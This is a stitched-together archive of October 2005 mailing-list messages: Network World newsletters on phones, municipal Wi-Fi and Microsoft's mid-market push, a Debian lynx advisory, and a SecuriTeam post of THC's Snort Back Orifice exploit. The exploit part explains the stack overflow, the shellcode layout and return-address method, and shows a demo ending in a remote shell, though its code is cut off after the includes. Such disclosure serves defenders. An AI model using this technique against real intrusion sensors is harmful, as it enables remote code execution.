Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005

Device makers have some fun with new offerings

NETWORK WORLD NEWSLETTER: KEITH SHAW ON WIRELESS COMPUTING
DEVICES
10/27/05
Today's focus: Device makers have some fun with new offerings

Dear security.world@gmail.com,

In this issue:

* News from Samsung, Verizon and Sony
* Links related to Wireless Computing Devices
* Featured reader resource
_______________________________________________________________
This newsletter is sponsored by Zultys
Network World Executive Guide: The Real World of VoIP

Join the Network World editors in an Executive Guide dedicated
to VoIP. Learn about the time and cost of planning, installing
and troubleshooting VoIP. Understand the user experience and
where the technology is headed. This timely information is
crucial to all forward thinking IT executives considering VoIP.

http://www.fattail.com/redir/redirect.asp?CID=118134
_______________________________________________________________
USERS AWASH IN EMERGING WIRELESS OPTIONS

The days of simply giving traveling employees a cell phone for
talking and a laptop for dial-up data are long gone, replaced by
a complex landscape of overlapping choices. There are decisions
to be made regarding devices, carrier contracts, performance and
reach. How do you know which decisions are the right ones? Click
here for more:
http://www.fattail.com/redir/redirect.asp?CID=118179
_______________________________________________________________

Today's focus: Device makers have some fun with new offerings

By Keith Shaw

Last issue we highlighted some new, serious,
"business-optimized" devices launched recently. Today, we're
going to highlight some new devices that let users have some fun
(although some business users may be able to still get some
value out of them).

* Samsung, Verizon launch camera, camcorder, MP3 player in one
device

Samsung and Verizon Wireless have launched the SCH-a970 mobile
phone, which includes a swivel-flip design (see it at Verizon's
Web site http://www.networkworld.com/nlmobile9271 ), a
2-megapixel camera, camcorder and MP3 digital music player.

The a970 includes a 262,000-color LCD screen, VoiceSignal's
VoiceMode speech-to-text dictation technology, and supports
Verizon's VCAST service, which lets users download video clips
to their phone (for an extra $15 per month).

Users can store their pictures, videos and music on a removable
TransFlash memory card that's sold separately. The phone is now
available for $299.99 after a $50 mail-in rebate and two-year
agreement. The phone has Bluetooth, but only for the headset and
hands-free accessories profiles (users won't be able to use
Bluetooth to connect their laptops to the Internet, for
example).

* Samsung and Verizon find the music in you

If music is more your thing, then Verizon Wireless and Samsung
hve a new phone that will turn you into a "mobile DJ." The
recently launched SCH-a950 includes dual stereo speakers and
enhanced sound quality for listing to ring tones, music/video
playback and even speakerphone conversations. The a950 includes
TransFlash memory card support for carrying around MP3 music
files (cards sold separately), and a jog dial on the phone that
lets users scroll through playlists quickly.

The a950 also supports Verizon's VCAST, and includes a
1.3-megapixel digital camera/camcorder for shooting photos and
videos. Bluetooth is also supported, but only for headset and
hands-free accessories. The phone will cost $149.99 after a $100
mail-in rebate and two-year agreement. More details are
available at the Verizon Wireless Web site
http://www.networkworld.com/nlmobile9272.

* Sony Vaio's holiday colors

If you're sick of your plain black notebook, Sony wants to add
some color to your life, or at least to your notebook. The
company recently introduced a line of slim, portable notebooks
with five different "fashion colors." The Vaio FJ series of
notebooks will include colors such as Onyx Black, Pearl White,
Sky Blue, Jade Green and Raspberry Red on their casings and palm
rests. The notebooks themselves will have a full-sized keyboard,
14.1-inch widescreen display (with Sony's XBRITE-ECO
technology), integrated 802.11b/g wireless, an on-board DVD
drive (+R double layer and +/- RW drive), and a built-in camera
and microphone for video chatting. The Onyx Black notebook,
starting at $1,400, will be available by the end of this month,
while the other colors will be available next month. Pre-orders
are being accepted here http://sony.com/fj.

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
http://www.networkworld.com/nlmobile9596
2. How to respond to a security breach
http://www.networkworld.com/nlmobile9772
3. School traps infected PCs in its web
http://www.networkworld.com/nlmobile9597
4. Cartoon of the Week http://www.networkworld.com/nlmobile9598

5. CTO: BellSouth lost 9 COs to Katrina
http://www.networkworld.com/nlmobile9773

_______________________________________________________________
To contact: Keith Shaw

Keith Shaw is Senior Editor, Product Testing, at Network World.
In addition, he writes the " Cool Tools
http://www.networkworld.com/columnists/cooltools.html " column,
which looks at gizmos, gadgets and other mobile computing
devices.

You can reach Keith at mailto:kshaw@nww.com.
_______________________________________________________________
This newsletter is sponsored by Intel
The 64-bit Tipping Point

With the launch of the new Intel Xeon processor with Intel
Extended Memory 64 Technology (Intel EM64T), the industry is
poised for a large-scale migration to 64-bit computing.
Read how Intel processor-based platforms offer unparalleled
flexibility for optimizing capacity, performance, and business
value across the full range of environments that will
be part of this movement.
http://www.fattail.com/redir/redirect.asp?CID=118110
_______________________________________________________________
ARCHIVE LINKS

Archive of the Wireless Computing Devices newsletter:
http://www.networkworld.com/newsletters/mobile/index.html Keith
Shaw's Cool Tools:
http://www.networkworld.com/columnists/cooltools.html
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

http://www.networkworld.com/news/2005/101005-grid.html
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
http://www.nwwsubscribe.com/Changes.aspx

To change your e-mail address, go to:
http://www.nwwsubscribe.com/ChangeMail.aspx

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: mailto:jcaruso@nww.com

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: mailto:sponsorships@nwfusion.com

Copyright Network World, Inc., 2005

[SECURITY] [DSA 874-1] New lynx packages fix arbitrary code execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 874-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
October 27th, 2005 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : lynx
Vulnerability : buffer overflow
Problem type : remote
Debian-specific: no
CVE ID : CVE-2005-3120

Ulf Härnhammar discovered a buffer overflow in lynx, a text-mode
browser for the WWW that can be remotely exploited. During the
handling of Asian characters when connecting to an NNTP server lynx
can be tricked to write past the boundary of a buffer which can lead
to the execution of arbitrary code.

For the old stable distribution (woody) this problem has been fixed in
version 2.8.4.1b-3.3.

For the stable distribution (sarge) this problem has been fixed in
version 2.8.5-2sarge1.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your lynx package.

Upgrade Instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

Source archives:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3.dsc
Size/MD5 checksum: 579 117f4e3d95a601741dc672012719042c
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3.diff.gz
Size/MD5 checksum: 14448 5e5d819520415baa0d91f75f0ee4f0af
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b.orig.tar.gz
Size/MD5 checksum: 2557510 053a10f76b871e3944c11c7776da7f7a

Alpha architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_alpha.deb
Size/MD5 checksum: 1610266 c887b1d0598b99fe1e3f45fedaaf3321

ARM architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_arm.deb
Size/MD5 checksum: 1487698 fb290d8440ef3b2b59f10e270b1d7bb6

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_i386.deb
Size/MD5 checksum: 1442878 31da62cb1f065acc2f65f2fd4481d530

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_ia64.deb
Size/MD5 checksum: 1762578 e57e52ed11ea52b55d6a5ede09b466a8

HP Precision architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_hppa.deb
Size/MD5 checksum: 1555440 4beb62a33cc2c0f00a45e69bed8b5591

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_m68k.deb
Size/MD5 checksum: 1405626 7f8d46f3d143781364337b666a55fa42

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_mips.deb
Size/MD5 checksum: 1507782 ae2ce1ddbe4855967d050a3e64e42e26

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_mipsel.deb
Size/MD5 checksum: 1503970 08e80c500a4d57a4e47fc45dbf0ebfe3

PowerPC architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_powerpc.deb
Size/MD5 checksum: 1491262 2b58dece4ae0a8a98b31e2f8eba40d13

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_s390.deb
Size/MD5 checksum: 1463360 1e5419b8db89374ea1c96f1219fe6e15

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_sparc.deb
Size/MD5 checksum: 1492728 f4da20fe1ac83ee9adf37d49bb896c63

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1.dsc
Size/MD5 checksum: 614 e7d5a14aafd2e9775c3175e44e3f9964
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1.diff.gz
Size/MD5 checksum: 14891 59cf146b8defbfa1b78df4306b951441
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5.orig.tar.gz
Size/MD5 checksum: 2984352 5f516a10596bd52c677f9bfd9579bc28

Alpha architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_alpha.deb
Size/MD5 checksum: 1994554 8a9eb6cd8ee34ad17aa06b912b588659

AMD64 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_amd64.deb
Size/MD5 checksum: 1881684 5afcd53828326a0cb056681047bd48e6

ARM architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_arm.deb
Size/MD5 checksum: 1852912 de530d45ce98e68932ec4624abd67201

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_i386.deb
Size/MD5 checksum: 1852488 ba9125c2da9c21a8bcd173ff82948a28

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_ia64.deb
Size/MD5 checksum: 2128374 156c023772481f6e9f8629c44082c94d

HP Precision architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_hppa.deb
Size/MD5 checksum: 1909574 24bbbc72ab025249a3adaa7717b316ff

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_m68k.deb
Size/MD5 checksum: 1780590 449249ca3e257a33a5a9d7da16379076

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_mips.deb
Size/MD5 checksum: 1894006 f30b06596b5ed9d881e1f3ba767aca2a

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_mipsel.deb
Size/MD5 checksum: 1889486 0b650edf6ca51547aedd7c7754bbda99

PowerPC architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_powerpc.deb
Size/MD5 checksum: 1878284 d90c1dc3fb2d5be179b827c32c14e222

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_s390.deb
Size/MD5 checksum: 1866758 60f30f0ebd7556799e565b4411a8d429

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_sparc.deb
Size/MD5 checksum: 1861536 85c12b7bd67f9800b49ab4b6b97a1dfd

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFDYIifW5ql+IAeqTIRAtcXAJ9M3xJh6sypyxujf2lLUPpprsMw7ACgnzU3
faJgn6sAKnC3FOgrps21jeY=
=pCOX
-----END PGP SIGNATURE-----

--
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

[EXPL] Snort Back Orifice Preprocessor Buffer Overflow (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Snort Back Orifice Preprocessor Buffer Overflow (Exploit)
------------------------------------------------------------------------

SUMMARY

<http://www.snort.org/> Snort is a widely-deployed, open-source network
intrusion detection system (IDS). Snort preprocessors are modular plugins
that extend functionality by operating on packets before the detection
engine is run.

Presented here is an exploit for the Snort Back Orifice preprocessor
buffer overflow. Exploiting a vulnerable system could allow a remote
attacker to execute arbitrary code.

DETAILS

Vulnerable Systems:
* Snort versions 2.4.0 to 2.4.2
* Sourcefire Intrusion Sensors

Exploit:
/*
* THCsnortbo 0.3 - Snort BackOrifice PING exploit
* by rd@thc.org
* THC PUBLIC SOURCE MATERIALS
*
* Bug was found by Internet Security Systems
* http://xforce.iss.net/xforce/alerts/id/207
*
* v0.3 - removed/cleaned up info for public release
* v0.2 - details added, minor changes
* v0.1 - first release
*
* Greetz to all guests at THC's 10th
* Anniversary (TAX) :>
*
* $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $
*
*/

/*
* DETAILS
*
* The bug is in spp_bo.c, BoGetDirection() function
* static int BoGetDirection(Packet *p, char *pkt_data) {
* u_int32_t len = 0;
* u_int32_t id = 0;
* u_int32_t l, i;
* char type;
* char buf1[1024];
*
* ...
* buf_ptr = buf1;
* ...
* while ( i < len ) {
* plaintext = (char) (*pkt_data ^ (BoRand()%256));
* *buf_ptr = plaintext;
* i++;
* pkt_data++;
* buf_ptr++;
*
* len is taken from the BO packet header, so its a buffer
* overflow when len > buf1 size.
*
* The exchange of data between the BO client and server is
* done using encrypted UDP packets
*
* BO Packet Format (Ref: http://www.magnux.org/~flaviovs/boproto.html)
* Mnemonic Size in bytes
* MAGIC 8
* LEN 4
* ID 4
* T 1
* DATA variable
* CRC 1
*
* On x86, because of the stack layout, we end up overwriting
* the loop counter (i and len). To solve this problem, we
* can set back the approriate value for i and len. We can
* also able to set a NULL byte to stop the loop.
*
* There is no chance for bruteforce, snort will die after the
* first bad try. On Linux system with kernel 2.6 with VA
* randomized, it would be much harder for a reliable exploit.
*
*
* In case of _non-optimized_ compiled snort binary, the stack
* would looks like this:
*
* [ buf1 ]..[ i ]..[ len ]..[ebp][eip][*p][*pkt_data]
*
* The exploit could be reliable in this case, by using a
* pop/ret return addess. Lets send to snort a UDP packet
* as the following:
*
* [ BO HEADERS ][ .. ][ i ][ .. ][ len ][ .. ][ ret addr ][ NOP ][
shellcode ]
* [ Encrypted ][ Non
Encrypted ]
*
* When the overwriting loop stop, pkt_data will point to
* the memory after return address (NOP part) in raw packet
* data. So, using a return address that points to POP/RET
* instructions would be enough for a reliable exploit.
* (objdump -d binary|grep -B1 ret|grep -A1 pop to find one)
*
* This method will work well under linux kernel 2.6 with VA
* randomized also.
*
* In case of optimized binary, it would be harder since
* the counter i, len and buffer pointers could/possibly be
* registered variables. And the register points to buffer
* get poped from stack when the funtion return. In this case,
* the return address should be hard-coded but it would be
* unreliable (especially on linux kernel 2.6 with VA
* randomization patch).
*
* This exploit would generally work. Providing that you know
* how to find and use correct offsets and return address :>
*
*
* Example:
*
* $ ./THCsnortbo
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Usage: ./THCsnortbo host target
*
* Available Targets:
* 1 | manual testing gcc with -O0
* 2 | manual testing gcc with -O2
*
* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1
*
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef HAVE_UNISTD_H
#include <unistd.h>

Wednesday, October 26, 2005

Pronto provides glue for municipal, public safety nets

NETWORK WORLD NEWSLETTER: JOANIE WEXLER ON WIRELESS IN THE
ENTERPRISE
10/26/05
Today's focus: Pronto provides glue for municipal, public
safety nets

Dear security.world@gmail.com,

In this issue:

* Municipalities band together into national network
* Links related to Wireless in the Enterprise
* Featured reader resource
_______________________________________________________________
This newsletter sponsored by Nortel
Building the Mobile Enterprise Online Expo

The workplace is changing rapidly. Employees need to be
untethered from their desks while remaining connected and
accessible. This online event helps you solve your enterprise
mobility challenges by bringing together industry leaders,
including Nortel's CTO and CIO and RIM's VP Enterprise Systems,
to discuss the hottest topics in enterprise mobility. Broadcast
live to your desktop on Nov. 8, 2005. Register today!
http://www.fattail.com/redir/redirect.asp?CID=117984
_______________________________________________________________
USERS AWASH IN EMERGING WIRELESS OPTIONS

The days of simply giving traveling employees a cell phone for
talking and a laptop for dial-up data are long gone, replaced by
a complex landscape of overlapping choices. There are decisions
to be made regarding devices, carrier contracts, performance and
reach. How do you know which decisions are the right ones? Click
here for more:
http://www.fattail.com/redir/redirect.asp?CID=118181
_______________________________________________________________

Today's focus: Pronto provides glue for municipal, public
safety nets

By Joanie Wexler

You might recall my recent coverage of the September CTIA
Wireless Association show, where former FCC Chairman Reed Hundt
begged the wireless industry to weave together an interoperable
nationwide public safety network.

Shortly thereafter, Pronto Networks announced it had signed up a
slew of municipalities to connect into a common, nationwide
broadband wireless network, in large part to serve public safety
applications. (It so happens, Hundt was quoted in Pronto's press
release announcing the effort, which it calls the UniFi Digital
Communities Grid. Coincidence? I think not! Reed sits on
Pronto's board of directors, according to the company's Web
site.)

Pronto, by the way, is in the business of offering operations
support services (OSS), such as billing, settlement, security,
provisioning and configuration, to public wireless LAN hot spot
services. For the UniFi Grid effort, the company offers one free
Network Services Controller to any municipality wishing to join.

The controller provides Wi-Fi access to the other networks
connecting to the grid and supports 200 users. The controller is
also the platform for the application services and OSS.

The service platform is the glue that binds together Wi-Fi
(802.11), WiMAX (802.16), mesh topologies and public safety
network infrastructures at the lower network layers, making all
communications and services function in a common way across the
local municipal networks the various cities choose to deploy.

At least 43 municipalities in California, Florida,
Massachusetts, New Jersey, New York, Ohio and Texas are already
signed on. Participating municipalities have agreed to give
reciprocal access to all government workers from participating
communities. Cities have the option to charge for access to
generate additional revenue or can opt to allow visitors to roam
for free on their network.

Pronto says it has committed to invest up to $15 million in
products and services to connect up to 500 municipalities in the
next 18 months. The company's presentation materials indicate
support for hierarchical control of emergency policies,
connecting city and state public safety organizations to federal
organizations such as the Federal Emergency Management Agency
and the Department of Homeland Security.

Other applications include enabling inter-municipality roaming
services to citizens, automated meter reading (AMR), traffic and
pedestrian control, video surveillance, and supervisory control
and data acquisition (SCADA) applications for water and
wastewater treatment. They are provided by software development
and systems integration partners Cellnet (AMR and SCADA), Cross
Current (public safety and computer-aided dispatch) and Lexis
(wireless parking management systems and equipment).

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
<http://www.networkworld.com/nlwir9743>
2. How to respond to a security breach
<http://www.networkworld.com/nlwir9744>
3. School traps infected PCs in its web
<http://www.networkworld.com/nlwir9375>
4. Cartoon of the Week <http://www.networkworld.com/nlwir9376>

5. CTO: BellSouth lost 9 COs to Katrina
<http://www.networkworld.com/nlwir9745>

_______________________________________________________________
To contact: Joanie Wexler

Joanie Wexler is an independent networking technology
writer/editor in California's Silicon Valley who has spent most
of her career analyzing trends and news in the computer
networking industry. She welcomes your comments on the articles
published in this newsletter, as well as your ideas for future
article topics. Reach her at <mailto:joanie@jwexler.com>.
_______________________________________________________________
This newsletter sponsored by Nortel
Building the Mobile Enterprise Online Expo

The workplace is changing rapidly. Employees need to be
untethered from their desks while remaining connected and
accessible. This online event helps you solve your enterprise
mobility challenges by bringing together industry leaders,
including Nortel's CTO and CIO and RIM's VP Enterprise Systems,
to discuss the hottest topics in enterprise mobility. Broadcast
live to your desktop on Nov. 8, 2005. Register today!
http://www.fattail.com/redir/redirect.asp?CID=117983
_______________________________________________________________
ARCHIVE LINKS

Archive of the Wireless in the Enterprise newsletter:
http://www.networkworld.com/newsletters/wireless/index.html
Wireless research center Latest wireless news, analysis and
resource links http://www.networkworld.com/topics/wireless.html
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

<http://www.networkworld.com/news/2005/101005-grid.html>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005

Microsoft focuses on the mid-market

NETWORK WORLD NEWSLETTER: DAVE KEARNS ON WINDOWS NETWORKING TIPS
10/26/05
Today's focus: Microsoft focuses on the mid-market

Dear security.world@gmail.com,

In this issue:

* Microsoft defines a new midsize market
* Links related to Windows Networking Tips
* Featured reader resource
_______________________________________________________________
This newsletter sponsored by Nortel
Building the Mobile Enterprise Online Expo

The workplace is changing rapidly. Employees need to be
untethered from their desks while remaining connected and
accessible. This online event helps you solve your enterprise
mobility challenges by bringing together industry leaders,
including Nortel's CTO and CIO and RIM's VP Enterprise Systems,
to discuss the hottest topics in enterprise mobility. Broadcast
live to your desktop on Nov. 8, 2005. Register today!
http://www.fattail.com/redir/redirect.asp?CID=117982
_______________________________________________________________
MANAGEMENT FRAMEWORKS ARE OUT - BUT WHAT'S IN?

Many vendors stopped using the term "frameworks" when they
became synonymous with endless deployment cycles. So, if
management frameworks are out, what is the alternative? Does a
series of multiple products from multiple vendors work? Will
Configuration Management Database (CMDB) emerge as the new
"framework" or "platform" for the enterprise? Click here for
more:
http://www.fattail.com/redir/redirect.asp?CID=118224
_______________________________________________________________

Today's focus: Microsoft focuses on the mid-market

By Dave Kearns

I poked a little fun at Microsoft last month (see " Microsoft
Centro: Is it right for you?
<http://www.networkworld.com/newsletters/nt/2005/0919nt2.html?rl>
") when I looked at the company's entry into the midsize market
as opposed to the small business/home business and enterprise
markets. In particular, I questioned the definition the company
used: A small business was 25 or fewer PCs, an enterprise was
more than 500 PCs, and everything in between was "midsize."

As it turns out, there's more to the story than was apparent at
that time.

Microsoft has defined a new midsize market, but it hasn't tried
to make it a "one-size fits all" market. A quick visit to the
new Microsoft Midsize Business IT Center
<http://www.networkworld.com/nlwnt9393> shows that, in fact,
Redmond segments the less-than-enterprise-sized market into
three fractions: 25 to 50 PCs, 51 to 250 PCs and 251 to 500 PCs.
You might call those fractions small to midsize, mid- to midsize
and large to midsize. You might. Microsoft didn't, and neither
will I, but you might. Not only does Microsoft differentiate
these three sizes, but it also provides guides and "solutions"
tailored to each level.

For the lower end, this includes:

* Solutions based on Microsoft Small Business Server 2003.
* Security guidelines for small businesses.
* Small IT solution for mobility.

The mid-level program includes:
* Desktop deployment solutions.
* Security and patch management guidance.
* Suggestions for implementing messaging, collaboration and
print services.

Suggestions for the biggest mid-level installations include:
* Security, anti-virus, and back-up and recovery guides.
* Desktop deployment solutions.
* Application-compatibility testing and mitigation guides.

There's also a lot more information organized for everyone who
deals with 500 PCs or fewer, which can be very useful even if
your network is simply a small part of some larger installation.

When Microsoft introduced this mid-market initiative at last
month's Business Summit 2005 conference, CEO Steve Ballmer said:
"The midmarket customer is the least well-served customer across
a spectrum of people involved in IT today. They are challenged
in dealing with complexity and scale, and need to find solutions
that are very appropriate to their needs." It looks like
Microsoft is going to do its best to provide the products and
guidance necessary to help the midmarket IT manager get the job
done.

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
<http://www.networkworld.com/nlwnt9740>
2. How to respond to a security breach
<http://www.networkworld.com/nlwnt9741>
3. School traps infected PCs in its web
<http://www.networkworld.com/nlwnt9373>
4. Cartoon of the Week <http://www.networkworld.com/nlwnt9374>

5. CTO: BellSouth lost 9 COs to Katrina
<http://www.networkworld.com/nlwnt9742>

_______________________________________________________________
To contact: Dave Kearns

Dave Kearns is a writer and consultant in Silicon Valley. He's
written a number of books including the (sadly) now out of print
"Peter Norton's Complete Guide to Networks." His musings can be
found at Virtual Quill <http://www.vquill.com/>.

Kearns is the author of three Network World Newsletters: Windows
Networking Tips, Novell NetWare Tips, and Identity Management.
Comments about these newsletters should be sent to him at these

respective addresses: <mailto:windows@vquill.com>,
<mailto:netware@vquill.com>, <mailto:identity@vquill.com>.

Kearns provides content services to network vendors: books,
manuals, white papers, lectures and seminars, marketing,
technical marketing and support documents. Virtual Quill
provides "words to sell by..." Find out more by e-mail at
<mailto:info@vquill.com>
_______________________________________________________________
This newsletter is sponsored by Intel
Optimizing the Value of Today's Server Hardware Transitions

Infrastructure demands are increasing, and the computing
industry is transitioning to multi-core processors, server
virtualization, and 64-bit computing to support next-generation
workloads. Read Optimizing the Value of Today's Server Hardware
and learn how Intel is integrating a broad set of new server
technologies to support these transitions.
http://www.fattail.com/redir/redirect.asp?CID=118098
_______________________________________________________________
ARCHIVE LINKS

Breaking Windows networking news from Network World, updated
daily: http://www.networkworld.com/topics/windows.html Operating
Systems Research Center:
http://www.networkworld.com/topics/operating-systems.html
Archive of the Windows Networking Tips newsletter:
http://www.networkworld.com/newsletters/nt/index.html
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

<http://www.networkworld.com/news/2005/101005-grid.html>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005